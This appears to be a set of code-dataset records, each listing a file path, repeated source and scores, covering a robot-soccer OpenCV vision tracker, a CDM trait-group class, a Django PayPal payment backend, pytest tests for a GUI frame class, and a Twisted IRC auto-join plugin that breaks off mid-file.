self.robots_found[1] = True
self.allies_angles[1] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 2
mask = cv2.inRange(robot_roi, self.segm_limits[3][0], self.segm_limits[3][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[2] = [shirt_x, shirt_y]
self.robots_found[2] = True
self.allies_angles[2] = self.find_angle(local_id_x, local_id_y, offset, offset)
def find_allies_shirt(self):
mask = cv2.inRange(self.frame, self.segm_limits[4][0], self.segm_limits[4][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
self.allies_shirt = []
if self.contours:
for contour in self.contours:
M = cv2.moments(contour)
if M['m00'] == 0:
self.allies_shirt.append([0, 0])
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.allies_shirt.append([cx, cy])
def find_angle(self, id_x, id_y, shirt_x, shirt_y):
# Angle will be calculated as th = arctg(dy/dx)
# -1 'cause the y axis of a image grows in down direction, so in fact we're doing dy = shirt.cy - clr_id.cy
dx = id_x - shirt_x
dy = -1 * (id_y - shirt_y)
theta = np.arctan2(dy, dx)
return theta
def mount_msg(self):
for robot in xrange(3):
if self.robots_found[robot] == True:
self.vision_msg.found[robot] = True
self.vision_msg.x[robot] = self.allies_position[robot][0]
self.vision_msg.y[robot] = self.allies_position[robot][1]
self.vision_msg.th[robot] = self.allies_angles[robot]
self.vision_msg.ball_x = self.ball_position[0]
self.vision_msg.ball_y = self.ball_position[1]
def get_vision_msg(self):
return self.vision_msg | image_tracker.py | import cv2
import numpy as np
from utils import ShapeDetector
from vision.msg import VisionMessage
offset = 15
class ImageTracker:
def __init__(self, segm_limits, kernel):
self.shape_detector = ShapeDetector()
self.kernel = kernel
self.frame = None
self.vision_msg = VisionMessage()
self.contours = None
self.segm_limits = np.array(segm_limits)
self.ball_position = [0, 0]
self.buffer_ball = [0, 0]
self.allies_shirt = []
self.allies_position = [[], [], []]
self.allies_angles = [0, 0, 0]
self.robots_found = [[False], [False], [False], [False], [False], [False]]
def set_frame(self, frame):
self.frame = frame
def find_colours(self):
self.find_ball()
self.find_team()
self.mount_msg()
def find_team(self):
self.find_allies_shirt()
self.find_robots()
def find_ball(self):
mask = cv2.inRange(self.frame, self.segm_limits[0][0], self.segm_limits[0][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "circle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
if self.contours:
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
if self.buffer_ball == [0, 0]:
self.ball_position = [0, 0]
else:
self.ball_position = self.buffer_ball
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.ball_position = [cx, cy]
self.buffer_ball = [cx, cy]
else:
self.ball_position = self.buffer_ball
def find_robots(self):
self.robots_found = np.array([[False], [False], [False], [False], [False], [False]])
self.allies_angles = [0, 0, 0]
for position in self.allies_shirt:
shirt_x = position[0]
shirt_y = position[1]
xi, xf = shirt_x - offset, shirt_x + offset
yi, yf = shirt_y - offset, shirt_y + offset
robot_roi = self.frame[yi:yf, xi:xf]
# Find robot 0
mask = cv2.inRange(robot_roi, self.segm_limits[1][0], self.segm_limits[1][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for c in self.contours:
if cv2.contourArea(c) < 100:
index = np.where(self.contours==c)
self.contours = np.delete(self.contours,index)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[0] = [shirt_x, shirt_y]
self.robots_found[0] = True
self.allies_angles[0] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 1
mask = cv2.inRange(robot_roi, self.segm_limits[2][0], self.segm_limits[2][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[1] = [shirt_x, shirt_y]
self.robots_found[1] = True
self.allies_angles[1] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 2
mask = cv2.inRange(robot_roi, self.segm_limits[3][0], self.segm_limits[3][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[2] = [shirt_x, shirt_y]
self.robots_found[2] = True
self.allies_angles[2] = self.find_angle(local_id_x, local_id_y, offset, offset)
def find_allies_shirt(self):
mask = cv2.inRange(self.frame, self.segm_limits[4][0], self.segm_limits[4][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
self.allies_shirt = []
if self.contours:
for contour in self.contours:
M = cv2.moments(contour)
if M['m00'] == 0:
self.allies_shirt.append([0, 0])
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.allies_shirt.append([cx, cy])
def find_angle(self, id_x, id_y, shirt_x, shirt_y):
# Angle will be calculated as th = arctg(dy/dx)
# -1 'cause the y axis of a image grows in down direction, so in fact we're doing dy = shirt.cy - clr_id.cy
dx = id_x - shirt_x
dy = -1 * (id_y - shirt_y)
theta = np.arctan2(dy, dx)
return theta
def mount_msg(self):
for robot in xrange(3):
if self.robots_found[robot] == True:
self.vision_msg.found[robot] = True
self.vision_msg.x[robot] = self.allies_position[robot][0]
self.vision_msg.y[robot] = self.allies_position[robot][1]
self.vision_msg.th[robot] = self.allies_angles[robot]
self.vision_msg.ball_x = self.ball_position[0]
self.vision_msg.ball_y = self.ball_position[1]
def get_vision_msg(self):
return self.vision_msg | 0.203312 | 0.217576 |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
from typing import Optional, TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.utilities import ResolveOptions, logger
from cdm.enums import CdmLogCode
from .cdm_object_def import CdmObjectDefinition
if TYPE_CHECKING:
from cdm.objectmodel import CdmCorpusContext
from cdm.utilities import VisitCallback
class CdmTraitGroupDefinition(CdmObjectDefinition):
"""
The CDM definition of a Trait Group object, representing a collection (grouping) of one or more traits.
"""
def __init__(self, ctx: 'CdmCorpusContext', trait_group_name: str) -> None:
super().__init__(ctx)
self._TAG = CdmTraitGroupDefinition.__name__
# the trait name.
self.trait_group_name = trait_group_name # type: str
@property
def object_type(self) -> CdmObjectType:
return CdmObjectType.TRAIT_GROUP_DEF
def get_name(self):
return self.trait_group_name
def copy(self, res_opt: Optional['ResolveOptions'] = None, host: Optional['CdmTraitGroupDefinition'] = None) \
-> 'CdmTraitGroupDefinition':
if not res_opt:
res_opt = ResolveOptions(wrt_doc=self, directives=self.ctx.corpus.default_resolution_directives)
if not host:
copy = CdmTraitGroupDefinition(self.ctx, self.trait_group_name)
else:
copy = host
copy.trait_group_name = self.trait_group_name
self._copy_def(res_opt, copy)
return copy
def validate(self) -> bool:
if not bool(self.trait_group_name):
missing_fields = ['trait_group_name']
logger.error(self.ctx, self._TAG, 'validate', self.at_corpus_path,
CdmLogCode.ERR_VALDN_INTEGRITY_CHECK_FAILURE, self.at_corpus_path,
', '.join(map(lambda s: '\'' + s + '\'', missing_fields)))
return False
return True
def is_derived_from(self, base: str, res_opt: Optional['ResolveOptions'] = None) -> bool:
return False
def visit(self, path_from: str, pre_children: 'VisitCallback', post_children: 'VisitCallback') -> bool:
path = ''
if self.ctx.corpus._block_declared_path_changes is False:
path = self._declared_path
if not path:
path = path_from + self.trait_group_name
self._declared_path = path
if pre_children and pre_children(self, path):
return False
if self._visit_def(path, pre_children, post_children):
return True
if post_children and post_children(self, path):
return True
return False
def _construct_resolved_traits(self, rtsb: 'ResolvedTraitSetBuilder', res_opt: 'ResolveOptions') -> None:
super()._construct_resolved_traits_def(None, rtsb, res_opt)
def _construct_resolved_attributes(self, res_opt: 'ResolveOptions', under: Optional['CdmAttributeContext'] = None) \
-> None:
return None | objectModel/Python/cdm/objectmodel/cdm_trait_group_def.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
from typing import Optional, TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.utilities import ResolveOptions, logger
from cdm.enums import CdmLogCode
from .cdm_object_def import CdmObjectDefinition
if TYPE_CHECKING:
from cdm.objectmodel import CdmCorpusContext
from cdm.utilities import VisitCallback
class CdmTraitGroupDefinition(CdmObjectDefinition):
"""
The CDM definition of a Trait Group object, representing a collection (grouping) of one or more traits.
"""
def __init__(self, ctx: 'CdmCorpusContext', trait_group_name: str) -> None:
super().__init__(ctx)
self._TAG = CdmTraitGroupDefinition.__name__
# the trait name.
self.trait_group_name = trait_group_name # type: str
@property
def object_type(self) -> CdmObjectType:
return CdmObjectType.TRAIT_GROUP_DEF
def get_name(self):
return self.trait_group_name
def copy(self, res_opt: Optional['ResolveOptions'] = None, host: Optional['CdmTraitGroupDefinition'] = None) \
-> 'CdmTraitGroupDefinition':
if not res_opt:
res_opt = ResolveOptions(wrt_doc=self, directives=self.ctx.corpus.default_resolution_directives)
if not host:
copy = CdmTraitGroupDefinition(self.ctx, self.trait_group_name)
else:
copy = host
copy.trait_group_name = self.trait_group_name
self._copy_def(res_opt, copy)
return copy
def validate(self) -> bool:
if not bool(self.trait_group_name):
missing_fields = ['trait_group_name']
logger.error(self.ctx, self._TAG, 'validate', self.at_corpus_path,
CdmLogCode.ERR_VALDN_INTEGRITY_CHECK_FAILURE, self.at_corpus_path,
', '.join(map(lambda s: '\'' + s + '\'', missing_fields)))
return False
return True
def is_derived_from(self, base: str, res_opt: Optional['ResolveOptions'] = None) -> bool:
return False
def visit(self, path_from: str, pre_children: 'VisitCallback', post_children: 'VisitCallback') -> bool:
path = ''
if self.ctx.corpus._block_declared_path_changes is False:
path = self._declared_path
if not path:
path = path_from + self.trait_group_name
self._declared_path = path
if pre_children and pre_children(self, path):
return False
if self._visit_def(path, pre_children, post_children):
return True
if post_children and post_children(self, path):
return True
return False
def _construct_resolved_traits(self, rtsb: 'ResolvedTraitSetBuilder', res_opt: 'ResolveOptions') -> None:
super()._construct_resolved_traits_def(None, rtsb, res_opt)
def _construct_resolved_attributes(self, res_opt: 'ResolveOptions', under: Optional['CdmAttributeContext'] = None) \
-> None:
return None | 0.914549 | 0.11694 |
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from urllib.parse import urlencode
from urllib.request import urlopen
from django.core.urlresolvers import reverse
from django.conf import settings as project_settings
from .base import BackendBase
class PaypalBackend(BackendBase):
backend_id = 'paypal'
backend_verbose_name = _("PayPal")
backend_display_name = _("PayPal")
backend_has_recurring = True
def __init__(self, settings):
self.test = settings.get('TEST', False)
self.header_image = settings.get('HEADER_IMAGE', None)
self.title = settings.get('TITLE', 'VPN Payment')
self.currency = settings.get('CURRENCY', 'EUR')
self.account_address = settings.get('ADDRESS')
self.receiver_address = settings.get('RECEIVER', self.account_address)
if self.test:
default_api = 'https://www.sandbox.paypal.com/'
else:
default_api = 'https://www.paypal.com/'
self.api_base = settings.get('API_BASE', default_api)
if self.account_address:
self.backend_enabled = True
def new_payment(self, payment):
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick',
'notify_url': ROOT_URL + reverse('payments:cb_paypal', args=(payment.id,)),
'item_name': self.title,
'amount': '%.2f' % (payment.amount / 100),
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:view', args=(payment.id,)),
'cancel_return': ROOT_URL + reverse('payments:cancel', args=(payment.id,)),
}
if self.header_image:
params['cpp_header_image'] = self.header_image
payment.status_message = _("Waiting for PayPal to confirm the transaction... " +
"It can take up to a few minutes...")
payment.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def new_subscription(self, rps):
months = {
'3m': 3,
'6m': 6,
'12m': 12,
}[rps.period]
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick-subscriptions',
'notify_url': ROOT_URL + reverse('payments:cb_paypal_subscr', args=(rps.id,)),
'item_name': self.title,
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:return_subscr', args=(rps.id,)),
'cancel_return': ROOT_URL + reverse('account:index'),
'a3': '%.2f' % (rps.period_amount / 100),
'p3': str(months),
't3': 'M',
'src': '1',
}
if self.header_image:
params['cpp_header_image'] = self.header_image
rps.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def handle_verified_callback(self, payment, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if txn_type not in (None, 'web_accept', 'express_checkout'):
# Not handled here and can be ignored
return
if params['payment_status'] == 'Refunded':
payment.status = 'refunded'
payment.status_message = None
elif params['payment_status'] == 'Completed':
self.handle_completed_payment(payment, params)
def handle_verified_callback_subscr(self, subscr, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if not txn_type.startswith('subscr_'):
# Not handled here and can be ignored
return
if txn_type == 'subscr_payment':
if params['payment_status'] == 'Refunded':
# FIXME: Find the payment and do something
pass
elif params['payment_status'] == 'Completed':
payment = subscr.create_payment()
if not self.handle_completed_payment(payment, params):
return
subscr.last_confirmed_payment = payment.created
subscr.backend_extid = params.get('subscr_id', '')
if subscr.status == 'new' or subscr.status == 'unconfirmed':
subscr.status = 'active'
subscr.save()
elif txn_type == 'subscr_cancel' or txn_type == 'subscr_eot':
subscr.status = 'cancelled'
subscr.save()
def handle_completed_payment(self, payment, params):
from payments.models import Payment
# Prevent making duplicate Payments if IPN is received twice
pc = Payment.objects.filter(backend_extid=params['txn_id']).count()
if pc > 0:
return False
if self.receiver_address != params['receiver_email']:
raise ValueError('Wrong receiver: ' + params['receiver_email'])
if self.currency.lower() != params['mc_currency'].lower():
raise ValueError('Wrong currency: ' + params['mc_currency'])
payment.paid_amount = int(float(params['mc_gross']) * 100)
if payment.paid_amount < payment.amount:
raise ValueError('Not fully paid.')
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
payment.backend_extid = params['txn_id']
payment.status = 'confirmed'
payment.status_message = None
payment.save()
return True
def verify_ipn(self, request):
v_url = self.api_base + '/cgi-bin/webscr?cmd=_notify-validate'
v_req = urlopen(v_url, data=request.body, timeout=5)
v_res = v_req.read()
return v_res == b'VERIFIED'
def callback(self, payment, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback(payment, params)
return True
except (KeyError, ValueError) as e:
payment.status = 'error'
payment.status_message = None
payment.backend_data['ipn_exception'] = repr(e)
payment.backend_data['ipn_last_data'] = repr(request.POST)
payment.save()
raise
def callback_subscr(self, subscr, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback_subscr(subscr, params)
return True
except (KeyError, ValueError) as e:
subscr.status = 'error'
subscr.status_message = None
subscr.backend_data['ipn_exception'] = repr(e)
subscr.backend_data['ipn_last_data'] = repr(request.POST)
subscr.save()
raise
def get_ext_url(self, payment):
if not payment.backend_extid:
return None
url = 'https://history.paypal.com/webscr?cmd=_history-details-from-hub&id=%s'
return url % payment.backend_extid
def get_subscr_ext_url(self, subscr):
if not subscr.backend_extid:
return None
return ('https://www.paypal.com/fr/cgi-bin/webscr?cmd=_profile-recurring-payments'
'&encrypted_profile_id=%s' % subscr.backend_extid) | payments/backends/paypal.py | from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from urllib.parse import urlencode
from urllib.request import urlopen
from django.core.urlresolvers import reverse
from django.conf import settings as project_settings
from .base import BackendBase
class PaypalBackend(BackendBase):
backend_id = 'paypal'
backend_verbose_name = _("PayPal")
backend_display_name = _("PayPal")
backend_has_recurring = True
def __init__(self, settings):
self.test = settings.get('TEST', False)
self.header_image = settings.get('HEADER_IMAGE', None)
self.title = settings.get('TITLE', 'VPN Payment')
self.currency = settings.get('CURRENCY', 'EUR')
self.account_address = settings.get('ADDRESS')
self.receiver_address = settings.get('RECEIVER', self.account_address)
if self.test:
default_api = 'https://www.sandbox.paypal.com/'
else:
default_api = 'https://www.paypal.com/'
self.api_base = settings.get('API_BASE', default_api)
if self.account_address:
self.backend_enabled = True
def new_payment(self, payment):
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick',
'notify_url': ROOT_URL + reverse('payments:cb_paypal', args=(payment.id,)),
'item_name': self.title,
'amount': '%.2f' % (payment.amount / 100),
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:view', args=(payment.id,)),
'cancel_return': ROOT_URL + reverse('payments:cancel', args=(payment.id,)),
}
if self.header_image:
params['cpp_header_image'] = self.header_image
payment.status_message = _("Waiting for PayPal to confirm the transaction... " +
"It can take up to a few minutes...")
payment.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def new_subscription(self, rps):
months = {
'3m': 3,
'6m': 6,
'12m': 12,
}[rps.period]
ROOT_URL = project_settings.ROOT_URL
params = {
'cmd': '_xclick-subscriptions',
'notify_url': ROOT_URL + reverse('payments:cb_paypal_subscr', args=(rps.id,)),
'item_name': self.title,
'currency_code': self.currency,
'business': self.account_address,
'no_shipping': '1',
'return': ROOT_URL + reverse('payments:return_subscr', args=(rps.id,)),
'cancel_return': ROOT_URL + reverse('account:index'),
'a3': '%.2f' % (rps.period_amount / 100),
'p3': str(months),
't3': 'M',
'src': '1',
}
if self.header_image:
params['cpp_header_image'] = self.header_image
rps.save()
return redirect(self.api_base + '/cgi-bin/webscr?' + urlencode(params))
def handle_verified_callback(self, payment, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if txn_type not in (None, 'web_accept', 'express_checkout'):
# Not handled here and can be ignored
return
if params['payment_status'] == 'Refunded':
payment.status = 'refunded'
payment.status_message = None
elif params['payment_status'] == 'Completed':
self.handle_completed_payment(payment, params)
def handle_verified_callback_subscr(self, subscr, params):
if self.test and params['test_ipn'] != '1':
raise ValueError('Test IPN')
txn_type = params.get('txn_type')
if not txn_type.startswith('subscr_'):
# Not handled here and can be ignored
return
if txn_type == 'subscr_payment':
if params['payment_status'] == 'Refunded':
# FIXME: Find the payment and do something
pass
elif params['payment_status'] == 'Completed':
payment = subscr.create_payment()
if not self.handle_completed_payment(payment, params):
return
subscr.last_confirmed_payment = payment.created
subscr.backend_extid = params.get('subscr_id', '')
if subscr.status == 'new' or subscr.status == 'unconfirmed':
subscr.status = 'active'
subscr.save()
elif txn_type == 'subscr_cancel' or txn_type == 'subscr_eot':
subscr.status = 'cancelled'
subscr.save()
def handle_completed_payment(self, payment, params):
from payments.models import Payment
# Prevent making duplicate Payments if IPN is received twice
pc = Payment.objects.filter(backend_extid=params['txn_id']).count()
if pc > 0:
return False
if self.receiver_address != params['receiver_email']:
raise ValueError('Wrong receiver: ' + params['receiver_email'])
if self.currency.lower() != params['mc_currency'].lower():
raise ValueError('Wrong currency: ' + params['mc_currency'])
payment.paid_amount = int(float(params['mc_gross']) * 100)
if payment.paid_amount < payment.amount:
raise ValueError('Not fully paid.')
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
payment.backend_extid = params['txn_id']
payment.status = 'confirmed'
payment.status_message = None
payment.save()
return True
def verify_ipn(self, request):
v_url = self.api_base + '/cgi-bin/webscr?cmd=_notify-validate'
v_req = urlopen(v_url, data=request.body, timeout=5)
v_res = v_req.read()
return v_res == b'VERIFIED'
def callback(self, payment, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback(payment, params)
return True
except (KeyError, ValueError) as e:
payment.status = 'error'
payment.status_message = None
payment.backend_data['ipn_exception'] = repr(e)
payment.backend_data['ipn_last_data'] = repr(request.POST)
payment.save()
raise
def callback_subscr(self, subscr, request):
if not self.verify_ipn(request):
return False
params = request.POST
try:
self.handle_verified_callback_subscr(subscr, params)
return True
except (KeyError, ValueError) as e:
subscr.status = 'error'
subscr.status_message = None
subscr.backend_data['ipn_exception'] = repr(e)
subscr.backend_data['ipn_last_data'] = repr(request.POST)
subscr.save()
raise
def get_ext_url(self, payment):
if not payment.backend_extid:
return None
url = 'https://history.paypal.com/webscr?cmd=_history-details-from-hub&id=%s'
return url % payment.backend_extid
def get_subscr_ext_url(self, subscr):
if not subscr.backend_extid:
return None
return ('https://www.paypal.com/fr/cgi-bin/webscr?cmd=_profile-recurring-payments'
'&encrypted_profile_id=%s' % subscr.backend_extid) | 0.41052 | 0.077274 |
import pytest
from cuppak.component.abstract_frame import AbstractFrame
from cuppak.dto import *
##SET UP
class ConcreteAbstractFrame(AbstractFrame):
def __init__(self, window, columns, rows, **kw):
super().__init__(window, columns, rows, **kw)
def change_child_state(self, state):
super().change_child_state(state)
##TESTS
def test_abstract_frame_not_instantiatable():
expected_error = "Can't instantiate abstract class AbstractFrame " + \
'with abstract methods __init__, change_child_state'
try:
abstract_frame = AbstractFrame(None, [], [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_can_instantiate_concrete():
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame
def test_abstract_frame_handles_invalid_columns_parameters():
expected_error = 'columns must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, 1, [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_handles_invalid_rows_parameters():
expected_error = 'rows must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, [], 'dog')
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_alter_dimensions():
columns = [ColumnDefinition(2), ColumnDefinition(4), ColumnDefinition(1)]
rows = [RowDefinition(1), RowDefinition(2), RowDefinition(1)]
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame._columns == 0
assert concrete_frame._rows == 0
concrete_frame._alter_dimensions(columns,rows)
assert concrete_frame._columns == len(columns)
assert concrete_frame._rows == len(rows)
def test_abstract_frame_change_child_state():
concrete_frame = ConcreteAbstractFrame(None, [], [])
concrete_frame.change_child_state('disabled') | cuppak/tests/component/abstract_frame_test.py | import pytest
from cuppak.component.abstract_frame import AbstractFrame
from cuppak.dto import *
##SET UP
class ConcreteAbstractFrame(AbstractFrame):
def __init__(self, window, columns, rows, **kw):
super().__init__(window, columns, rows, **kw)
def change_child_state(self, state):
super().change_child_state(state)
##TESTS
def test_abstract_frame_not_instantiatable():
expected_error = "Can't instantiate abstract class AbstractFrame " + \
'with abstract methods __init__, change_child_state'
try:
abstract_frame = AbstractFrame(None, [], [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_can_instantiate_concrete():
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame
def test_abstract_frame_handles_invalid_columns_parameters():
expected_error = 'columns must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, 1, [])
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_handles_invalid_rows_parameters():
expected_error = 'rows must be a list'
try:
concrete_frame = ConcreteAbstractFrame(None, [], 'dog')
assert False
except TypeError as error:
assert str(error) == expected_error
def test_abstract_frame_alter_dimensions():
columns = [ColumnDefinition(2), ColumnDefinition(4), ColumnDefinition(1)]
rows = [RowDefinition(1), RowDefinition(2), RowDefinition(1)]
concrete_frame = ConcreteAbstractFrame(None, [], [])
assert concrete_frame._columns == 0
assert concrete_frame._rows == 0
concrete_frame._alter_dimensions(columns,rows)
assert concrete_frame._columns == len(columns)
assert concrete_frame._rows == len(rows)
def test_abstract_frame_change_child_state():
concrete_frame = ConcreteAbstractFrame(None, [], [])
concrete_frame.change_child_state('disabled') | 0.524395 | 0.584568 |
from twisted.internet import defer, reactor
from zope.interface import implements, classProvides
from automatron.backend.plugin import IAutomatronPluginFactory
from automatron.controller.client import IAutomatronSignedOnHandler, IAutomatronChannelJoinedHandler,\
IAutomatronChannelLeftHandler, IAutomatronChannelKickedHandler
class AutoJoinPlugin(object):
classProvides(IAutomatronPluginFactory)
implements(
IAutomatronSignedOnHandler,
IAutomatronChannelJoinedHandler,
IAutomatronChannelLeftHandler,
IAutomatronChannelKickedHandler,
)
name = 'auto_join'
priority = 100
def __init__(self, controller):
self.controller = controller
def on_signed_on(self, server):
return self._on_signed_on(server)
@defer.inlineCallbacks
def _on_signed_on(self, server):
channels, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels and channels.strip():
for channel in channels.split(','):
self._join_channel(server, channel.strip())
@defer.inlineCallbacks
def _join_channel(self, server, channel):
channel_key = yield self.controller.config.get_value('channel', server['server'], channel, 'key')
self.controller.join(server['server'], channel, channel_key)
def on_channel_joined(self, server, channel):
self._on_channel_joined(server, channel)
@defer.inlineCallbacks
def _on_channel_joined(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is None or channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if not channel in channels:
channels.append(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_left(self, server, channel):
self._on_channel_left(server, channel)
@defer.inlineCallbacks
def _on_channel_left(self, server, channel):
track, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'track')
if track == 'false':
return
channels, channels_rel = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels_rel is not None and channels_rel > 0:
channels = [c.strip() for c in (channels or '').split(',') if c.strip()]
if channel in channels:
channels.remove(channel)
self.controller.config.update_plugin_value(self, server['server'], None, 'join', ','.join(channels))
def on_channel_kicked(self, server, channel, kicker, message):
reactor.callLater(3, self._join_channel, server, channel) | twisted/plugins/automatron_auto_join.py | from twisted.internet import defer, reactor
from zope.interface import implements, classProvides
from automatron.backend.plugin import IAutomatronPluginFactory
from automatron.controller.client import IAutomatronSignedOnHandler, IAutomatronChannelJoinedHandler,\
IAutomatronChannelLeftHandler, IAutomatronChannelKickedHandler
class AutoJoinPlugin(object):
classProvides(IAutomatronPluginFactory)
implements(
IAutomatronSignedOnHandler,
IAutomatronChannelJoinedHandler,
IAutomatronChannelLeftHandler,
IAutomatronChannelKickedHandler,
)
name = 'auto_join'
priority = 100
def __init__(self, controller):
self.controller = controller
def on_signed_on(self, server):
return self._on_signed_on(server)
@defer.inlineCallbacks
def _on_signed_on(self, server):
channels, _ = yield self.controller.config.get_plugin_value(self, server['server'], None, 'join')
if channels and channels.strip():
for channel in channels.split(','):
self._join_channel(server, channel.strip())
@defer.inlineCallbacks
def _join_channel(self, server, channel):
channel_key = yield self.controller.config.get_value('channel', server['server'], channel, 'key')
self.controller.join(server['server'], channel, channel_key)
def on_channel_joined(self, server, channel):
self._on_channel_joined(server, channel)
@defer.inlineCallbacks
def _on_channel_joined(self, server, channel):
